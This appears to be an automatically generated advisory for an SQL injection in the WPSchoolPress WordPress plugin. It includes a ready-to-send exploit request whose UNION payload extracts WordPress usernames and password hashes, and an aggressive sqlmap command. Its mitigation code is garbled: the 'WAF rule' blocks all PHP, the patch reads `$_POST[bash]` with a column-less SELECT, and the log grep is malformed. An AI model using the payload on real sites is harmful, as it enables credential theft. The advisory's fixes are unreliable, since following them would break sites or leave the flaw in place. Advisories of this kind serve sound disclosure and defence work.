The WPSchoolPress plugin (≤ 2.2.16) for WordPress is vulnerable to SQL Injection via the `cid` parameter due to improper input sanitization and lack of prepared statements. Authenticated attackers with “Custom-level” access can manipulate SQL queries by injecting malicious payloads into the `cid` parameter. This allows execution of arbitrary SQL commands, potentially leading to unauthorized data access, modification, or database takeover. The vulnerability stems from direct concatenation of user input into SQL queries without proper escaping.
DailyCVE Form:
Platform: WordPress
Version: ≤ 2.2.16
Vulnerability: SQL Injection
Severity: Critical
Date: 03/28/2025
What Undercode Say:
Exploit:
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.com Action: wpsp_get_class_students cid=1' UNION SELECT user_login,user_pass FROM wp_users-- -
Detection:
sqlmap -u "https://target.com/wp-admin/admin-ajax.php" --data="action=wpsp_get_class_students&cid=1" --risk=3 --level=5
Mitigation:
1. Update to WPSchoolPress ≥ 2.2.17.
2. Apply WAF rules blocking SQLi patterns:
location ~ .php$ {
deny all;
}
3. Patch code snippet (PHP):
$cid = $wpdb->prepare("%d", $_POST[bash]);
$results = $wpdb->get_results("SELECT FROM {$wpdb->prefix}wpsp_students WHERE cid = $cid");
Log Analysis:
grep -E 'POST.cid=[bash]' /var/log/nginx/access.log
Indicators of Compromise (IoC):
- Unusual `admin-ajax.php` requests with `cid` parameter containing SQL keywords.
- Unexpected database exports or user table accesses.
Workaround:
add_filter('query', function($sql) {
if (preg_match('/\b(UNION|SELECT\s.+\sFROM)\b/i', $sql)) {
wp_die('SQL Injection attempt blocked.');
}
return $sql;
});
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-1670
Extra Source Hub:
Undercode
